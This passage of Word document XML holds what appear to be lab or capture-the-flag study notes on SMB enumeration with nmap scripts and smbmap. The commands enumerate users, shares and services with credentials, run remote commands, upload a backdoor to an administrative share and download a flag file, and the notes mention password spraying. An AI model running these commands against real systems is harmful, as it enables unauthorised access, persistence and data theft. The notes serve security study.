        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-sessions –script-args smbusername=(USERNAME),smbpassword=(PASSWORD) (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0107CC40" w14:textId="20458888" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can view users that are logged in as well as display the user we are logged in as. WE WILL NEED CREDS TO SMB FOR THIS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAAAAC4" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D98E3E7" w14:textId="725002DE" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-shares (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1DD40" w14:textId="19F9BECE" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate what we have access to at the authentication level that SMB specifies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67AA8A" w14:textId="6C8CC26D" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will display results in a row format and determine if share types are hidden, accessible, etc. based on the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE724F4" w14:textId="4661A101" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IPC share is useful as its an anonymous session, allows you to utilize a “null” or anonymous session and lets you get in as a guest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E53FAC8" w14:textId="0E3FFEED" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>print$ share is also useful to share printer info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575ED3E3" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120128E2" w14:textId="01167607" w:rsidR="00792D20" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="00792D20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –scrip</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>t=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-shares –script-args smbusername=(USERNAME),smbpassword=(PASSWORD) (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCE34F" w14:textId="45C1CC4D" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Utilizing the smb-enum-shares script as well as using a script argument to log in as a different user could potentially reveal more shares that you have access to as that user that you logged in as.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04244EA0" w14:textId="1813D766" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00765EFD" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00765EFD" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-users –script-args smbusername=(USERNAME),smbpassword=(PASSWORD) (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A79943" w14:textId="77777777" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E158D5D" w14:textId="70F4A63F" w:rsidR="0073148E" w:rsidRPr="002A77BD" w:rsidRDefault="0073148E" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Could also potentially </w:t>
      </w:r>
      <w:r w:rsidR="00765EFD" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>enumerate users this way and see if they exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD1C1B" w14:textId="0BDDCC09" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will display users that may not have been visible on the basic authentication account (guest).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45B3A0" w14:textId="5E4237A8" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Could include assets to put in the writeup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B4039" w14:textId="19AB5A7A" w:rsidR="00E061A0" w:rsidRPr="002A77BD" w:rsidRDefault="00E061A0" w:rsidP="0073148E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Base command can give us users we could potentially use password spraying on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36479E50" w14:textId="77777777" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D16844D" w14:textId="50E2CDD8" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-groups –script-args smbusername=(USERNAME),smbpassword=(PASSWORD) (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7342C6" w14:textId="693B75D0" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate groups and the users that are in those respective groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720A4478" w14:textId="677B5285" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -p445 –script</w:t>
      </w:r>
      <w:r w:rsidR="007D1A77" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>smb-enum-services –script-args smbusername=(USERNAME),smbpassword=(PASSWORD) (IP ADDRESS)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C551ECC" w14:textId="68722C4C" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerate those potential services and, if applicable, can lead to exploits if there are services that are vulnerable or outdated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092CEFB" w14:textId="77777777" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00765EFD" w:rsidP="00765EFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="446A3149" w14:textId="2B6F24F0" w:rsidR="00765EFD" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00765EFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>It’s</w:t>
      </w:r>
      <w:r w:rsidR="00765EFD" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> important to note that you can include multiple scripts in an nmap command by separating them with a comma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D596B9" w14:textId="77777777" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A42B437" w14:textId="337BA20E" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SMBMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E54B0" w14:textId="77777777" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C38CD7B" w14:textId="4133ED66" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Program made in python that allows you to login and view shares based on the directory specification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EA796" w14:textId="260DFFCD" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbmap -u (USERNAME, guest in this case) -p “” (blank) -d . “NULL DIR” -H (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385814A" w14:textId="28601270" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“smbmap -u </w:t>
      </w:r>
      <w:r w:rsidR="00324525" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(USERNAME)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidR="00324525" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>(PASSWORD)</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d . -H (HOST) -x ‘ipconfig’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3903984A" w14:textId="6EF2D520" w:rsidR="00236C71" w:rsidRPr="002A77BD" w:rsidRDefault="00236C71" w:rsidP="00236C71">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If you have enumerated the SMB server and it is vulnerable, you could potentially execute the above command in the smbmap command (using -x flag) to reveal information about the host or potentially exploit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1BF08" w14:textId="07C17A19" w:rsidR="00324525" w:rsidRPr="002A77BD" w:rsidRDefault="00324525" w:rsidP="00324525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbmap -u (USERNAME) -p (PASSWORD) -d . -H (HOST) -L”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55197296" w14:textId="0D379B49" w:rsidR="00324525" w:rsidRPr="002A77BD" w:rsidRDefault="00324525" w:rsidP="00324525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will display local network drives, net drives, or other mapped network drives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080A52B3" w14:textId="719F872A" w:rsidR="00324525" w:rsidRPr="002A77BD" w:rsidRDefault="00324525" w:rsidP="00324525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbmap -u (USERNAME) -p (PASSWORD) -d . -H (HOST) -r ‘(DRIVE)’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015A5F35" w14:textId="08B53802" w:rsidR="00324525" w:rsidRPr="002A77BD" w:rsidRDefault="00324525" w:rsidP="00324525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Connect to drive and view contents if permissions allow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46182CEF" w14:textId="2882A844" w:rsidR="00324525" w:rsidRPr="002A77BD" w:rsidRDefault="00324525" w:rsidP="00324525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“smbmap -u (USERNAME) -p (PASSWORD) </w:t>
      </w:r>
      <w:r w:rsidR="00D734CA" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-H (HOST) –upload ‘(BACKDOOR FILE PATH)’ ‘(FILEPATH OF DESIGNATED UPLOADED FILE)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616AF96E" w14:textId="68AEACF4" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Example: “smbmap -u Administrator -p ‘smbserver_771’ -H (HOST) –upload ‘/root/backdoor’ ‘C$\backdoor’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71951016" w14:textId="5A0349AA" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Could potentially upload backdoors or other files to gain further access or further enumerate the machine (or exploits, could lead to a lot of stuff if we’re able to do this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4EA75" w14:textId="7EEA9122" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“smbmap -u (USERNAME) -p (PASSWORD) -H (HOST) –download ‘(FILEPATH)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107FB26" w14:textId="3D9909AE" w:rsidR="00D734CA" w:rsidRPr="002A77BD" w:rsidRDefault="00D734CA" w:rsidP="00D734CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example: “smbmap -u Administrator -p ‘smbserver_771’ -H (HOST) –download ‘C$\flag.txt’”</w:t>
      </w:r>
    </w:p>
